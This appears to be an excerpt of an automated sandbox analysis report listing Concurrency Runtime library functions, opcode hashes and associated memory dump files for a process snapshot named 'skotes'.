                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2033596534-0
                                                                                                                                            • Opcode ID: 5d2a1ca01c4cae32020877c2ae5d00a85f29509c4b19dd2d1f9db6908d09397e
                                                                                                                                            • Instruction ID: 3aa92a7471087f4cb5179737f9e70af38f0219978590a71a5716305db6113c16
                                                                                                                                            • Opcode Fuzzy Hash: 5d2a1ca01c4cae32020877c2ae5d00a85f29509c4b19dd2d1f9db6908d09397e
                                                                                                                                            • Instruction Fuzzy Hash: F721C172900754DFDB04EF65DA82DAEB7F4AF04310B20406AF002AB2A2DB316E41CB50
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00AEA069
                                                                                                                                              • Part of subcall function 00AEB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00AEB5AF
                                                                                                                                            • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00AEA07F
                                                                                                                                            • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00AEA0CB
                                                                                                                                              • Part of subcall function 00AEAB41: List.LIBCONCRT ref: 00AEAB77
                                                                                                                                            • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00AEA0DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 932774601-0
                                                                                                                                            • Opcode ID: 7bc7dda43b1b2ac169b1d64186b8b1a16d9e1216cc1c4a5b73435ae806da2ec1
                                                                                                                                            • Instruction ID: 0cb137b1fbc88aec05eadbbe5464b75a92017f60f3063bb228a74fe6d06276a0
                                                                                                                                            • Opcode Fuzzy Hash: 7bc7dda43b1b2ac169b1d64186b8b1a16d9e1216cc1c4a5b73435ae806da2ec1
                                                                                                                                            • Instruction Fuzzy Hash: AA218931500B159FCB24EF66DA908ABF3F5FF58710B00495EE443A7661DB74B905CBA2
                                                                                                                                            APIs
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AE4893
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AE48A5
                                                                                                                                              • Part of subcall function 00AE5555: _InternalDeleteHelper.LIBCONCRT ref: 00AE5564
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AE48AF
                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 00AE48C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3844194624-0
                                                                                                                                            • Opcode ID: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                            • Instruction ID: 48df85471d5941f5c6ad03140ff895c1969025a92c7decca00a988203dc83e78
                                                                                                                                            • Opcode Fuzzy Hash: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                            • Instruction Fuzzy Hash: 1D01F9317005A1BFCB15BB66DAC6E7DB76EBF49710B00012AF50457612DF21EC2187A1
                                                                                                                                            APIs
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AEEE6A
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AEEE7C
                                                                                                                                              • Part of subcall function 00AEEF29: _InternalDeleteHelper.LIBCONCRT ref: 00AEEF3B
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AEEE86
                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 00AEEE9F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3844194624-0
                                                                                                                                            • Opcode ID: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                            • Instruction ID: 54e286d3aa77ec68e633c6d2c40f1ae07f505fe2ba44bd10d03dcfd402ec018f
                                                                                                                                            • Opcode Fuzzy Hash: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                            • Instruction Fuzzy Hash: E101F431300661BFCB25FB66CAC2E7EBB69FF89710700046AF4059B612CB20EC2186E0
                                                                                                                                            APIs
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AED0C5
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AED0D7
                                                                                                                                              • Part of subcall function 00AEC6B2: _InternalDeleteHelper.LIBCONCRT ref: 00AEC6C4
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AED0E1
                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 00AED0FA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
